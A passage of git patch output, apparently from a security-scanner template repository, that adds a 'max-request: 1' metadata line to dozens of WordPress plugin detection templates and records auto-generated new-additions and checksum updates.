https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 888795547dc5a5216b1d67277adf50333d88dc15 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jul 2023 05:30:01 +0000 Subject: [PATCH 291/609] Auto Generated New Template Addition List [Mon Jul 3 05:30:01 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1e110ddd06..bd8abaf271 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ http/exposed-panels/pritunl-panel.yaml +http/exposed-panels/untangle-admin-login.yaml From 699858e8672b9d4241b21fcf3991a09066604271 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jul 2023 05:30:11 +0000 Subject: [PATCH 292/609] Auto Generated Templates Checksum [Mon Jul 3 05:30:11 UTC 2023] :robot: --- templates-checksum.txt | 403 +++++++++++++++++++++-------------------- 1 file changed, 202 insertions(+), 201 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 56cfa1e964..b65eddf089 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3237,6 +3237,7 @@ 